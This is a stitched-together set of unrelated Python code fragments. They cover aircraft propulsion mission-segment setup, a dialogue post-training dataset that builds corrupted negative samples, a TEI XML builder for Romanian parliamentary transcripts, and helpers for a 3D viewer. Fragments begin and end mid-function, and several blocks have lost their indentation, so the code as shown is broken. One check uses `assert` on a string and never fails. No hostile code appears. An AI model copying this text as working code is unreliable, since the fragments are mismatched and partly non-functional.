        segment.state.unknowns.propeller_power_coefficient   = initial_prop_power_coefficient * ones_row(n_props)
        segment.state.unknowns.lift_rotor_power_coefficient  = initial_lift_rotor_power_coefficient * ones_row(n_lift_rotors)
    # Setup the conditions for the propellers
    segment.state.conditions.propulsion.propeller_motor_torque     = 0. * ones_row(n_props)
    segment.state.conditions.propulsion.propeller_torque           = 0. * ones_row(n_props)
    segment.state.conditions.propulsion.propeller_rpm              = 0. * ones_row(n_props)
    segment.state.conditions.propulsion.propeller_disc_loading     = 0. * ones_row(n_props)
    segment.state.conditions.propulsion.propeller_power_loading    = 0. * ones_row(n_props)
    segment.state.conditions.propulsion.propeller_thrust           = 0. * ones_row(n_props)
    segment.state.conditions.propulsion.propeller_tip_mach         = 0. * ones_row(n_props)
    segment.state.conditions.propulsion.propeller_efficiency       = 0. * ones_row(n_props)
    segment.state.conditions.propulsion.propeller_motor_efficiency = 0. * ones_row(n_props)
    # Setup the conditions for the lift_rotors
    segment.state.conditions.propulsion.lift_rotor_motor_torque     = 0. * ones_row(n_lift_rotors)
    segment.state.conditions.propulsion.lift_rotor_torque           = 0. * ones_row(n_lift_rotors)
    segment.state.conditions.propulsion.lift_rotor_rpm              = 0. * ones_row(n_lift_rotors)
    segment.state.conditions.propulsion.lift_rotor_disc_loading     = 0. * ones_row(n_lift_rotors)
    segment.state.conditions.propulsion.lift_rotor_power_loading    = 0. * ones_row(n_lift_rotors)
    segment.state.conditions.propulsion.lift_rotor_thrust           = 0. * ones_row(n_lift_rotors)
    segment.state.conditions.propulsion.lift_rotor_tip_mach         = 0. * ones_row(n_lift_rotors)
    segment.state.conditions.propulsion.lift_rotor_efficiency       = 0. * ones_row(n_lift_rotors)
    segment.state.conditions.propulsion.lift_rotor_motor_efficiency = 0. * ones_row(n_lift_rotors)
    # Ensure the mission knows how to pack and unpack the unknowns and residuals
    segment.process.iterate.unknowns.network  = self.unpack_unknowns_transition
    segment.process.iterate.residuals.network = self.residuals_transition
    return segment
def add_cruise_unknowns_and_residuals_to_segment(self, segment, initial_voltage = None,
initial_prop_power_coefficient = 0.005,
initial_battery_cell_temperature = 283.,
initial_battery_state_of_charge = 0.5,
initial_battery_cell_current = 5.):
""" This function sets up the information that the mission needs to run a mission segment using this network
Assumptions:
None
Source:
N/A
Inputs:
segment
initial_voltage [v]
initial_power_coefficient [float]s
Outputs:
segment.state.unknowns.battery_voltage_under_load
segment.state.unknowns.propeller_power_coefficient
segment.state.conditions.propulsion.propeller_motor_torque
segment.state.conditions.propulsion.propeller_torque
Properties Used:
N/A
"""
# unpack the ones function
ones_row = segment.state.ones_row
# Count how many unknowns and residuals based on p
n_props = len(self.propellers)
n_motors_p = len(self.propeller_motors)
n_eng_p = self.number_of_propeller_engines
if n_props!=n_motors_p!=n_eng_p:
assert('The number of propellers is not the same as the number of motors')
# Now check if the props/lift_rotors are all identical, in this case they have the same of residuals and unknowns
if self.identical_propellers:
n_props = 1
else:
self.number_of_propeller_engines = int(self.number_of_propeller_engines)
if self.identical_lift_rotors:
n_lift_rotors = 1
else:
self.number_of_lift_rotor_engines = int(self.number_of_lift_rotor_engines)
# Assign initial segment | |
length = len([i for i in utterance if i not in self.special_tokens])
if length > 0:
item_n.append(utterance)
l.append(length)
self.data.extend(item_n)
# (begin, end, max-length) for one session
for i in range(1, len(item_n)):
self.table.append((
offset,
offset+i,
len(self.data)
))
def __len__(self):
    """Return the number of samples (one per (begin, end, max-length) entry)."""
    sample_count = len(self.table)
    return sample_count
def packup_tokens(self, session):
    """Flatten a session into one token list, joining consecutive utterances
    with the [EOS] separator token (no trailing separator).

    :param session: list of utterances, each a list of token ids.
    :returns: flat list of token ids.
    """
    tokens = []
    for utterance in session:
        tokens.extend(utterance + [self.eos])
    # Robustness fix: the original unconditionally popped, which raised
    # IndexError on an empty session. Only drop the trailing separator
    # when something was appended; behavior is unchanged otherwise.
    if tokens:
        tokens.pop()
    return tokens
def build_for_label_0(self, session, end):
    """Label 0: negative sample — pair the context with a random response
    drawn from anywhere in the corpus (excluding the ground truth)."""
    # Redraw until the candidate is not the ground-truth response index.
    neg_idx = random.randint(0, len(self.data) - 1)
    while neg_idx == end:
        neg_idx = random.randint(0, len(self.data) - 1)
    response = self.data[neg_idx]
    # Flatten the context and clip the pair to the length budget.
    context = self.packup_tokens(session[:-1])
    truncate_pair(context, response, self.args['max_len'])
    input_ids   = [self.cls] + context + [self.sep] + response + [self.sep]
    segment_ids = [0] * (len(context) + 2) + [1] * (len(response) + 1)
    return input_ids, segment_ids
def build_for_label_1(self, begin, end, max_l, session):
    """Label 1: hard negative — pair the context with a different utterance
    taken from the same session."""
    # Candidate indices are the session's own range, minus the ground truth.
    candidates = list(range(begin, max_l))
    candidates.remove(end)
    response = self.data[random.choice(candidates)]
    context = self.packup_tokens(session[:-1])
    truncate_pair(context, response, self.args['max_len'])
    input_ids   = [self.cls] + context + [self.sep] + response + [self.sep]
    segment_ids = [0] * (len(context) + 2) + [1] * (len(response) + 1)
    return input_ids, segment_ids
def build_for_label_2(self, session):
    """Label 2: positive sample — the context paired with its ground-truth
    response (the session's last utterance)."""
    context  = self.packup_tokens(session[:-1])
    response = session[-1]
    truncate_pair(context, response, self.args['max_len'])
    input_ids   = [self.cls] + context + [self.sep] + response + [self.sep]
    segment_ids = [0] * (len(context) + 2) + [1] * (len(response) + 1)
    return input_ids, segment_ids
def build_for_label_3(self, begin, max_l, session_origin):
    """Label 3: corrupt the context by inserting one random utterance.

    Returns (ids, tids) on success, or (None, None) if no valid sample
    could be generated within ``self.retry_time`` attempts.
    """
    # insert one random utterance into context
    for _ in range(self.retry_time):
        session = deepcopy(session_origin)
        # random response sample
        while True:
            rand_idx = random.randint(0, len(self.data)-1)
            # reject candidates drawn from this session's own index range
            if rand_idx not in set(range(begin, max_l)):
                break
        random_response = self.data[rand_idx][:self.args['res_max_len']-2]
        idx = random.choice(range(len(session)))
        # per-token labels: 1 marks tokens of the inserted (fake) utterance
        session_label = [[0] * len(u) for u in session]
        session[idx:idx] = [random_response]
        session_label[idx:idx] = [[1] * len(random_response)]
        ids, labels = [], []
        for u, l in zip(session[:-1], session_label[:-1]):
            ids.extend(u + [self.eos])
            # the [EOS] separator inherits its utterance's label
            labels.extend(l + [l[-1]])
        ids.pop()
        labels.pop()
        response = deepcopy(session[-1])
        truncate_pair_with_labels(ids, labels, response, self.args['max_len'])
        # keep the sample only if the inserted tokens survived truncation
        if sum(labels) > 0:
            ids_ = [self.cls] + ids + [self.sep] + response + [self.sep]
            tids = [0] * (len(ids) + 2) + [1] * (len(response) + 1)
            return ids_, tids
    # Fail to generate the data in label 3
    return None, None
def build_for_label_4(self, session):
    """Label 4: corrupt the sample by shuffling the utterance order, then
    pair the shuffled context with the (shuffled) last utterance."""
    # random shuffle
    random_idx = list(range(len(session)))
    while True:
        # multi shuffle
        for _ in range(self.args['shuffle_time']):
            random.shuffle(random_idx)
        # retry until the permutation differs from the identity order
        if random_idx != list(range(len(session))):
            break
    session = [session[i] for i in random_idx]
    # ground-truth
    tokens = self.packup_tokens(session[:-1])
    response = session[-1]
    truncate_pair(tokens, response, self.args['max_len'])
    ids = [self.cls] + tokens + [self.sep] + response + [self.sep]
    tids = [0] * (len(tokens) + 2) + [1] * (len(response) + 1)
    return ids, tids
def build_for_label_5(self, session_origin):
    """Label 5: corrupt the context by deleting one interior utterance.

    Returns (ids, tids) on success, or (None, None) if no valid sample
    could be generated within ``self.retry_time`` attempts.
    """
    # randomly delete one utterance, cannot delete the right or left utterance
    for _ in range(self.retry_time):
        session = deepcopy(session_origin)
        # label each token with its utterance index so a deletion leaves a gap
        labels = [[idx] * len(u) for idx, u in enumerate(session)]
        idx = random.choice(range(1, len(session)-1))
        tokens = [u for i, u in enumerate(session) if i != idx]
        labels = [u for i, u in enumerate(labels) if i != idx]
        ids, labels_ = [], []
        for u, l in zip(tokens[:-1], labels[:-1]):
            ids.extend(u + [self.eos])
            # the [EOS] separator inherits its utterance's index label
            labels_.extend(l + [l[-1]])
        ids.pop()
        labels_.pop()
        rids_labels = labels[-1]
        response = tokens[-1]
        truncate_pair_with_labels(ids, labels_, response, self.args['max_len'], rids_labels=rids_labels)
        # check: accept only if an index gap (jump > 1) is still present
        # after truncation, i.e. the deletion point survived
        labels_ += rids_labels
        flag = False
        for idx in range(1, len(labels_)):
            if labels_[idx] - labels_[idx-1] in [0, 1]:
                pass
            else:
                flag = True
                break
        if flag:
            ids_ = [self.cls] + ids + [self.sep] + response + [self.sep]
            tids = [0] * (len(ids) + 2) + [1] * (len(response) + 1)
            return ids_, tids
    return None, None
    def build_for_label_6(self, begin, max_l, session_origin):
        """Negative sample for label 6: replace one context utterance (never
        the response) with a random utterance drawn from outside the current
        session.

        :param begin: start of the exclusion zone in ``self.data``
        :param max_l: end of the exclusion zone in ``self.data``
        :param session_origin: list of token-id lists (context + response)
        :return: (ids, tids), or (None, None) if no sample survived truncation
        """
        # random replace one utterance, cannot replace the last one
        for _ in range(self.retry_time):
            session = deepcopy(session_origin)
            # random sample idx
            # Resample until the random utterance is not part of this session.
            while True:
                rand_idx = random.randint(0, len(self.data)-1)
                if rand_idx not in set(range(begin, max_l)):
                    break
            random_response = self.data[rand_idx][:self.args['res_max_len']-2]
            idx = random.choice(range(len(session) - 1))
            # Token-level labels: 1 marks tokens of the injected utterance.
            labels = [[0] * len(u) for u in session]
            session[idx] = random_response
            labels[idx] = [1] * len(random_response)
            ids, labels_ = [], []
            for u, l in zip(session[:-1], labels[:-1]):
                ids.extend(u + [self.eos])
                labels_.extend(l + [l[-1]])
            ids.pop()
            labels_.pop()
            rids = deepcopy(session[-1])
            rids_labels = labels[-1]
            truncate_pair_with_labels(ids, labels_, rids, self.args['max_len'], rids_labels=rids_labels)
            # Only keep the sample if injected tokens survived truncation.
            if sum(labels_) > 0:
                ids_ = [self.cls] + ids + [self.sep] + rids + [self.sep]
                tids = [0] * (len(ids) + 2) + [1] * (len(rids) + 1)
                return ids_, tids
        return None, None
    def __getitem__(self, i):
        """Build one post-training sample for table entry ``i``.

        Draws a corruption label uniformly at random: 7-way when the session
        has at least 3 utterances, otherwise 5-way (labels 5 and 6 need an
        inner utterance to delete/replace). Builders may fail and return
        (None, None), in which case a new label is drawn.

        :return: (ids, tids, mask_labels, label)
        """
        begin, end, max_l = self.table[i]
        session = self.data[begin:end+1]
        # avoid the very long utterance
        session = [u[:self.args['res_max_len']-2] for u in session]
        while True:
            ratio = random.random()
            if len(session) >= 3:
                # 7 division
                # The intervals [1-k/7, 1-(k-1)/7) partition [0, 1), so one
                # branch always fires.
                if ratio >= 1 - 1/7:
                    ids, tids = self.build_for_label_0(session, end)
                    label = 0
                elif 1 - 2/7 <= ratio < 1 - 1/7:
                    ids, tids = self.build_for_label_1(begin, end, max_l, session)
                    label = 1
                elif 1 - 3/7 <= ratio < 1 - 2/7:
                    ids, tids = self.build_for_label_2(session)
                    label = 2
                elif 1 - 4/7 <= ratio < 1 - 3/7:
                    ids, tids = self.build_for_label_3(begin, max_l, session)
                    label = 3
                elif 1 - 5/7 <= ratio < 1 - 4/7:
                    ids, tids = self.build_for_label_4(session)
                    label = 4
                elif 1 - 6/7 <= ratio < 1 - 5/7:
                    ids, tids = self.build_for_label_5(session)
                    label = 5
                elif 1 - 7/7 <= ratio < 1 - 6/7:
                    ids, tids = self.build_for_label_6(begin, max_l, session)
                    label = 6
            else:
                # 5 division
                if ratio >= 1 - 1/5:
                    ids, tids = self.build_for_label_0(session, end)
                    label = 0
                elif 1 - 2/5 <= ratio < 1 - 1/5:
                    ids, tids = self.build_for_label_1(begin, end, max_l, session)
                    label = 1
                elif 1 - 3/5 <= ratio < 1 - 2/5:
                    ids, tids = self.build_for_label_2(session)
                    label = 2
                elif 1 - 4/5 <= ratio < 1 - 3/5:
                    ids, tids = self.build_for_label_3(begin, max_l, session)
                    label = 3
                elif 1 - 5/5 <= ratio < 1 - 4/5:
                    ids, tids = self.build_for_label_4(session)
                    label = 4
            if ids is not None and tids is not None:
                break
        # Apply MLM masking on top of the comparison sample.
        mask_labels = mask_sentence(
            ids,
            self.args['min_mask_num'],
            self.args['max_mask_num'],
            self.args['masked_lm_prob'],
            special_tokens=self.special_tokens,
            mask=self.mask,
            vocab_size=len(self.vocab),
        )
        return ids, tids, mask_labels, label
def save(self):
data = torch.save((self.data, self.table), self.pp_path)
print(f'[!] save preprocessed dataset into {self.pp_path}; size: {len(self.table)}')
def collate(self, batch):
ids, mask_labels, tids, labels = [], [], [], []
for ids_, tids_, mask_labels_, labels_ in batch:
ids.append(ids_)
tids.append(tids_)
mask_labels.append(mask_labels_)
labels.append(labels_)
ids = [torch.LongTensor(i) for i in ids]
tids = [torch.LongTensor(i) for i in tids]
mask_labels = [torch.LongTensor(i) for i in mask_labels]
labels = torch.LongTensor(labels)
ids = pad_sequence(ids, batch_first=True, padding_value=self.pad)
tids = pad_sequence(tids, batch_first=True, padding_value=self.pad)
mask_labels = pad_sequence(mask_labels, batch_first=True, padding_value=-1) # pad is not calculated for MLM
attn_mask = generate_mask(ids)
ids, tids, mask_labels, attn_mask, labels = to_cuda(ids, tids, mask_labels, attn_mask, labels)
return {
'ids': ids,
'tids': tids,
'mask_labels': mask_labels,
'attn_mask': attn_mask,
'label': labels,
}
class PostTrainComparisonDataset(Dataset):
    '''Dynamic Mask: no mask token will be set as the -1 label
    For a Chinese corpus, train.txt and test.txt must already have been tokenized by whitespace'''
    def __init__(self, vocab, path, **args):
        """Load (or build and cache) the comparison post-training dataset.

        :param vocab: HuggingFace-style tokenizer used to encode utterances
        :param path: path to the raw corpus file (one dialogue per line)
        """
        self.args = args
        self.vocab = vocab
        self.vocab.add_tokens(['[EOS]'])
        self.pad = self.vocab.convert_tokens_to_ids('[PAD]')
        self.sep = self.vocab.convert_tokens_to_ids('[SEP]')
        self.cls = self.vocab.convert_tokens_to_ids('[CLS]')
        self.unk = self.vocab.convert_tokens_to_ids('[UNK]')
        self.mask = self.vocab.convert_tokens_to_ids('[MASK]')
        self.eos = self.vocab.convert_tokens_to_ids('[EOS]')
        self.special_tokens = set([self.pad, self.sep, self.cls, self.unk, self.mask, self.eos])
        suffix = args['tokenizer'].replace('/', '_')
        self.pp_path = f'{os.path.splitext(path)[0]}_post_train_{suffix}.pt'
        # Reuse the cached preprocessed dataset when available.
        if os.path.exists(self.pp_path):
            self.data, self.table = torch.load(self.pp_path)
            print(f'[!] load preprocessed file from {self.pp_path}')
            return None
        data = read_text_data_utterances(path, lang=self.args['lang'])
        self.data = []
        self.table = []
        for label, utterances in tqdm(data):
            # Only dialogues with a positive label are used for post-training.
            if label == 0:
                continue
            item = self.vocab.batch_encode_plus(utterances, add_special_tokens=False)['input_ids']
            offset = len(self.data)
            self.data.extend(item)
            counter = 0
            # NOTE(review): `counter` is never used after this point.
            l = []
            # Count non-special tokens per utterance to filter empty responses.
            for utterance in item:
                l.append(len([i for i in utterance if i not in self.special_tokens]))
            # begin, end, max-length session
            for i in range(1, len(item)):
                if i < self.args['min_context_length']:
                    continue
                # check if the context and response are legal
                # if sum(l[:i+1]) > self.args['min_token_length'] and l[i] > 0:
                # self.table.append((offset, offset+i, len(self.data)))
                if l[i] > 0:
                    self.table.append((offset, offset+i, len(self.data)))
    def __len__(self):
        # One sample per (context, response) split recorded in the index table.
        return len(self.table)
def | |
<gh_stars>0
import logging
from datetime import date
from babel.dates import format_date
import re
from lxml import etree
from common import Resources
from parsing import parse_organization_name, SessionParser
from nltk.tokenize import word_tokenize
from pathlib import Path
from common import StringFormatter
from common import build_speaker_id, Gender, OrganizationType
import subprocess
from collections import namedtuple
from dateutil import parser
class XmlElements:
    """TEI element tags, fully qualified with the TEI namespace."""

    _NS = '{http://www.tei-c.org/ns/1.0}'

    TEI = _NS + 'TEI'
    titleStmt = _NS + 'titleStmt'
    title = _NS + 'title'
    meeting = _NS + 'meeting'
    u = _NS + 'u'
    div = _NS + 'div'
    extent = _NS + 'extent'
    measure = _NS + 'measure'
    date = _NS + 'date'
    bibl = _NS + 'bibl'
    setting = _NS + 'setting'
    tagUsage = _NS + 'tagUsage'
    text = _NS + 'text'
    body = _NS + 'body'
    head = _NS + 'head'
    note = _NS + 'note'
    seg = _NS + 'seg'
    kinesic = _NS + 'kinesic'
    desc = _NS + 'desc'
    gap = _NS + 'gap'
    idno = _NS + 'idno'
    listOrg = _NS + 'listOrg'
    org = _NS + 'org'
    orgName = _NS + 'orgName'
    event = _NS + 'event'
    listPerson = _NS + 'listPerson'
    person = _NS + 'person'
    persName = _NS + 'persName'
    forename = _NS + 'forename'
    surname = _NS + 'surname'
    sex = _NS + 'sex'
    affiliation = _NS + 'affiliation'
    figure = _NS + 'figure'
    graphic = _NS + 'graphic'
    s = _NS + 's'
    w = _NS + 'w'
    pc = _NS + 'pc'
    linkGrp = _NS + 'linkGrp'
    link = _NS + 'link'
class XmlAttributes:
    """XML attribute names (plain and namespace-qualified) used by the builders."""
    xml_id = '{http://www.w3.org/XML/1998/namespace}id'
    lang = '{http://www.w3.org/XML/1998/namespace}lang'
    element_type = 'type'
    meeting_n = 'n'
    unit = 'unit'
    quantity = 'quantity'
    when = 'when'
    gi = 'gi'
    occurs = 'occurs'
    ana = 'ana'
    who = 'who'
    full = 'full'
    # `role` was previously assigned twice with the same value; the duplicate
    # (dead) assignment has been removed.
    role = 'role'
    event_start = 'from'
    event_end = 'to'
    value = 'value'
    url = 'url'
    ref = 'ref'
    msd = 'msd'
    pos = 'pos'
    lemma = 'lemma'
    targFunc = 'targFunc'
    # Alias for 'type' kept because `type` is a Python builtin; same value as
    # element_type.
    type_ = 'type'
    target = 'target'
    corresp = 'corresp'
class SessionXmlBuilder:
    """Class responsible for building the XML file with the transcript of a session.
    """
    def __init__(self,
                 input_file,
                 template_file,
                 output_directory,
                 output_file_prefix='ParlaMint-RO'):
        """Creates a new instance of SessionXmlBuilder class.
        Parameters
        ----------
        input_file: str, required
            The path to the HTML file containing the session transcription.
        template_file: str, required
            The path to the file containing the XML template of the output.
        output_directory: str, required
            The path to the output directory.
        output_file_prefix: str, optional
            The prefix of the output file name. Default is `ParlaMint-RO`.
        """
        self.parser = SessionParser(input_file)
        self.formatter = StringFormatter()
        self.output_directory = output_directory
        self.output_file_prefix = output_file_prefix
        self.element_tree = parse_xml_file(template_file)
        self.xml = self.element_tree.getroot()
        # Cache the "debateSection" div of the template; all session content
        # is appended under this element by the _build_* methods below.
        for div in self.xml.iterdescendants(XmlElements.div):
            if div.get(XmlAttributes.element_type) == "debateSection":
                self.debate_section = div
    def write_to_file(self,
                      file_name=None,
                      group_by_year=False,
                      use_xmllint=False):
        """Writes the XML session to a file given by file_name or session id.
        Parameters
        ----------
        file_name: str, optional
            The name of the output file. Default is the session id.
        group_by_year: boolean, optional
            Specifies whether to group output files into directories by year.
            Default is `False`.
        use_xmllint: boolean, optional
            Specifies whether to use `xmllint` program for formatting the output xml.
            Default is `False`.
        """
        # NOTE(review): relies on self.id_builder / self.session_date, which
        # only exist after build_session_xml() has been called.
        if not file_name:
            file_name = "{}.xml".format(self.id_builder.session_id)
        if group_by_year:
            year = str(self.session_date.year)
            directory = Path(self.output_directory, year)
            if not directory.exists():
                directory.mkdir(parents=True, exist_ok=True)
            file_name = Path(directory, file_name)
        else:
            file_name = Path(self.output_directory, file_name)
        file_name = str(file_name)
        save_xml(self.element_tree, file_name, use_xmllint=use_xmllint)
    def build_session_xml(self):
        """Builds the session XML from its transcription.
        """
        self.session_date = self.parser.parse_session_date()
        self.session_type = self.parser.parse_session_type()
        self.id_builder = XmlIdBuilder(self.output_file_prefix,
                                       self.session_date)
        # Order matters: metadata first, then content, then statistics that
        # are computed from the assembled document.
        self._set_session_id()
        self._set_session_title()
        self._set_meeting_info()
        self._set_session_idno()
        self._set_session_date()
        self._build_session_heading()
        self._build_session_body()
        self._build_session_footer()
        self._cleanup_xml()
        self._set_session_stats()
        self._set_tag_usage()
    def _cleanup_xml(self):
        # Remove empty utterances and assign xml:id to every `u` element.
        # NOTE(review): removing elements while iterating iterdescendants()
        # can skip siblings in lxml, and ids are assigned even to removed
        # utterances (leaving gaps in the id sequence) — confirm intended.
        for u in self.debate_section.iterdescendants(tag=XmlElements.u):
            if len(u) == 0:
                self.debate_section.remove(u)
            u.set(XmlAttributes.xml_id, self.id_builder.build_utterance_id())
    def _build_session_footer(self):
        """Adds the end time segment(s) to the session description.
        """
        end_time = self.parser.parse_session_end_time()
        if end_time is not None:
            note = etree.SubElement(self.debate_section, XmlElements.note)
            note.set(XmlAttributes.element_type, "time")
            note.text = self.formatter.to_single_line(end_time)
    def _build_session_body(self):
        """Adds the session segments to the session description.
        """
        is_first = True
        utterance = None
        for segment in self.parser.parse_session_segments():
            text = segment.get_text()
            if len(text) == 0:
                continue
            if segment.is_speaker:
                note = etree.SubElement(self.debate_section, XmlElements.note)
                note.set(XmlAttributes.element_type, "speaker")
                note.text = self.formatter.to_single_line(text)
                if segment.has_note:
                    note = etree.SubElement(self.debate_section,
                                            XmlElements.note)
                    note.set(XmlAttributes.element_type, "editorial")
                    note.text = self.formatter.to_single_line(
                        segment.get_note_text())
                utterance = etree.SubElement(self.debate_section,
                                             XmlElements.u)
                # The first speaker of the session is treated as the chair;
                # later utterances are tagged #chair when the speaker matches.
                if is_first:
                    chairman = self.formatter.to_single_line(
                        segment.get_speaker())
                    is_first = False
                speaker = self.formatter.to_single_line(segment.get_speaker())
                utterance.set(XmlAttributes.ana,
                              "#chair" if speaker == chairman else "#regular")
                utterance.set(XmlAttributes.who,
                              self.id_builder.get_speaker_id(speaker))
            else:
                # NOTE(review): if the very first segment were not a speaker,
                # `utterance` would still be None here — presumably sessions
                # always open with a speaker note; confirm against the parser.
                seg = etree.SubElement(utterance, XmlElements.seg)
                seg.set(XmlAttributes.xml_id,
                        self.id_builder.build_segment_id())
                seg.text = self.formatter.to_single_line(text)
    def _build_session_heading(self):
        """Adds the head elements to session description.
        """
        head = etree.SubElement(self.debate_section, XmlElements.head)
        head.text = Resources.Heading
        session_head = etree.SubElement(self.debate_section, XmlElements.head)
        session_head.set(XmlAttributes.element_type, "session")
        session_head.text = Resources.SessionHeading.format(
            format_date(self.session_date, "d MMMM yyyy"))
        summary = self.parser.parse_session_summary()
        if len(summary) > 0:
            note = etree.SubElement(self.debate_section, XmlElements.note)
            note.set(XmlAttributes.element_type, "editorial")
            note.text = Resources.ToC
        # NOTE(review): the summary is parsed a second time here; reusing the
        # `summary` variable above would avoid the duplicate work.
        for summary_line in self.parser.parse_session_summary():
            note = etree.SubElement(self.debate_section, XmlElements.note)
            note.set(XmlAttributes.element_type, "summary")
            note.text = self.formatter.normalize(summary_line)
        heading = self.parser.parse_session_heading()
        if heading is not None:
            note = etree.SubElement(self.debate_section, XmlElements.note)
            note.set(XmlAttributes.element_type, "editorial")
            note.text = self.formatter.to_single_line(heading)
        start_time = self.parser.parse_session_start_time()
        if start_time is not None:
            note = etree.SubElement(self.debate_section, XmlElements.note)
            note.set(XmlAttributes.element_type, "time")
            note.text = self.formatter.to_single_line(start_time)
        chairmen = self.parser.parse_session_chairmen()
        if chairmen is not None:
            note = etree.SubElement(self.debate_section, XmlElements.note)
            note.set(XmlAttributes.element_type, "chairman")
            note.text = self.formatter.to_single_line(chairmen)
    def _set_tag_usage(self):
        """Updates the values for tagUsage elements.
        """
        name_map = {
            "text": XmlElements.text,
            "body": XmlElements.body,
            "div": XmlElements.div,
            "head": XmlElements.head,
            "note": XmlElements.note,
            "u": XmlElements.u,
            "seg": XmlElements.seg,
            "kinesic": XmlElements.kinesic,
            "desc": XmlElements.desc,
            "gap": XmlElements.gap
        }
        for tag_usage in self.xml.iterdescendants(tag=XmlElements.tagUsage):
            tag_name = name_map[tag_usage.get(XmlAttributes.gi)]
            num_occurences = self._get_num_occurences(tag_name)
            tag_usage.set(XmlAttributes.occurs, str(num_occurences))
    def _get_num_occurences(self, tag):
        """Computes the number of occurences for the specified tag.
        Parameters
        ----------
        tag: str
            The tag for which to compute number of occurences.
        Returns
        -------
        num_occurences: int
            The number of times the tag is present in the document.
        """
        tags = self.xml.iterdescendants(tag=tag)
        num_occurences = len([t for t in tags])
        return num_occurences
    def _set_session_date(self):
        """Updates the session date in the XML file.
        """
        # Only date elements under <setting> or <bibl> carry the session date.
        for date in self.xml.iterdescendants(tag=XmlElements.date):
            parent_tag = date.getparent().tag
            if parent_tag == XmlElements.setting or parent_tag == XmlElements.bibl:
                date.set(XmlAttributes.when,
                         format_date(self.session_date, "yyyy-MM-dd"))
                date.text = format_date(self.session_date, "dd.MM.yyyy")
    def _set_session_idno(self):
        """Updates the value of the `idno` element.
        """
        for idno in self.xml.iterdescendants(tag=XmlElements.idno):
            if idno.get(XmlAttributes.element_type) == 'URI':
                date = format_date(self.session_date, "yyyyMMdd")
                idno.text = "http://www.cdep.ro/pls/steno/steno2015.data?cam=2&dat={}".format(
                    date)
    def _set_session_stats(self):
        """Updates the session statistics of the extent element.
        """
        num_speeches = self._get_num_speeches()
        num_words = self._get_num_words()
        for m in self.xml.iterdescendants(tag=XmlElements.measure):
            if m.getparent().tag != XmlElements.extent:
                continue
            lang = m.get(XmlAttributes.lang)
            unit = m.get(XmlAttributes.unit)
            qty = num_speeches if unit == 'speeches' else num_words
            m.set(XmlAttributes.quantity, str(qty))
            if unit == 'speeches':
                txt = Resources.NumSpeechesRo if lang == 'ro' else Resources.NumSpeechesEn
            else:
                txt = Resources.NumWordsRo if lang == 'ro' else Resources.NumWordsEn
            m.text = txt.format(qty)
    def _get_num_words(self):
        """Computes the number of words from the session transcription.
        Returns
        -------
        num_words: int
            The number of words in the transcription.
        """
        text = "".join(self.debate_section.itertext())
        num_words = len(word_tokenize(text))
        return num_words
    def _get_num_speeches(self):
        """Computes the number of speeches (a.k.a. utterances).
        Returns
        -------
        num_speeches: int
            The number of speeches in the transcription.
        """
        speeches = [s for s in self.xml.iterdescendants(tag=XmlElements.u)]
        num_speeches = len(speeches)
        return num_speeches
    def _set_meeting_info(self):
        """Sets the contents of the meeting element.
        """
        meeting_n = format_date(self.session_date, "yyyyMMdd")
        for meeting in self.xml.iterdescendants(tag=XmlElements.meeting):
            meeting.set(XmlAttributes.meeting_n, meeting_n)
    def _set_session_title(self):
        """Sets the contents of the title elements.
        """
        ro_date = format_date(self.session_date, "d MMMM yyyy", locale="ro")
        en_date = format_date(self.session_date, "MMMM d yyyy", locale="en")
        for elem in self.xml.iterdescendants(tag=XmlElements.title):
            if elem.getparent().tag != XmlElements.titleStmt:
                continue
            title_type = elem.get(XmlAttributes.element_type)
            lang = elem.get(XmlAttributes.lang)
            if title_type == 'main' and lang == 'ro':
                elem.text = Resources.SessionTitleRo.format(ro_date)
            if title_type == 'main' and lang == 'en':
                elem.text = Resources.SessionTitleEn.format(en_date)
            if title_type == 'sub' and lang == 'ro':
                elem.text = Resources.SessionSubtitleRo.format(ro_date)
            if title_type == 'sub' and lang == 'en':
                elem.text = Resources.SessionSubtitleEn.format(en_date)
    def _set_session_id(self):
        """Sets the id of the TEI element.
        """
        self.xml.set(XmlAttributes.xml_id, self.id_builder.session_id)
def apply_xmllint(file_name):
    """Formats the specified file using xmllint.
    Parameters
    ----------
    file_name: str, required
        The full name of the file to be formatted.
    """
    logging.info("Formatting file [{}] using xmllint.".format(file_name))
    # subprocess.run consumes stdout/stderr while waiting; the previous
    # Popen(...).wait() with PIPE could deadlock if xmllint filled a pipe
    # buffer before exiting.
    subprocess.run(['xmllint', '--format', '--output', file_name, file_name],
                   stderr=subprocess.PIPE,
                   stdout=subprocess.PIPE)
def parse_xml_file(file_name):
    """Parse an XML file into an element tree, stripping whitespace.
    Parameters
    ----------
    file_name: str, required
        The name of the XML file.
    Returns
    -------
    xml_tree: etree.ElementTree
        The XML tree from the file.
    """
    xml_tree = etree.parse(file_name, etree.XMLParser(remove_blank_text=True))
    # Drop tail text on every node so later pretty-printing starts clean.
    for node in xml_tree.iter():
        node.tail = None
    return xml_tree
def save_xml(xml, file_name, use_xmllint=True):
    """Write the XML tree to disk and optionally reformat it with xmllint.
    Parameters
    ----------
    xml : etree.ElementRoot, required
        The XML tree to save to disk.
    file_name : str, required
        The file where to save the XML.
    use_xmllint: bool, optional
        Specifies whether to apply xmllint or not.
        Default is `True`.
    """
    xml.write(file_name, pretty_print=True, encoding='utf-8',
              xml_declaration=True)
    if use_xmllint:
        apply_xmllint(file_name)
def add_component_file_to_corpus_root(component_file, corpus_root):
"""Adds the `component_file` to the list of included files in | |
from datetime import datetime
import numpy as np
import os
import glob
from pathlib import Path
from vtk.util.numpy_support import numpy_to_vtk, vtk_to_numpy, numpy_to_vtkIdTypeArray
import vtk
import vedo
import math
#import trimesh
# Asset/example locations resolved relative to this module's parent package.
ROOT_FOLDER = Path(__file__).parent.parent
ASSETS_FOLDER = ROOT_FOLDER.joinpath('./iblviewer_assets')
FONTS_FOLDER = ASSETS_FOLDER.joinpath('./fonts')
EXAMPLES_FOLDER = ROOT_FOLDER.joinpath('./iblviewer_examples')
EXAMPLES_DATA_FOLDER = ROOT_FOLDER.joinpath('./iblviewer_examples/data')
def get_type(element):
    """
    Get the type of object as a lower-cased string
    :return: String
    """
    return element.__class__.__name__.lower()
def get_unique_name(collection, name, spacer='_'):
    """
    Create a unique key for a collection by appending numbers when entries exist
    :param collection: A list, collection, array, ...
    :param name: Name (for instance 'Points')
    :param spacer: Spacer char
    :return: New name, for instance 'Points_4'
    """
    if name not in collection:
        return name
    match_count = 0
    highest_suffix = 0
    for key in collection:
        if name not in key:
            continue
        match_count += 1
        # Track the largest numeric suffix already in use.
        if spacer in key:
            highest_suffix = max(int(key.split(spacer)[1]), highest_suffix)
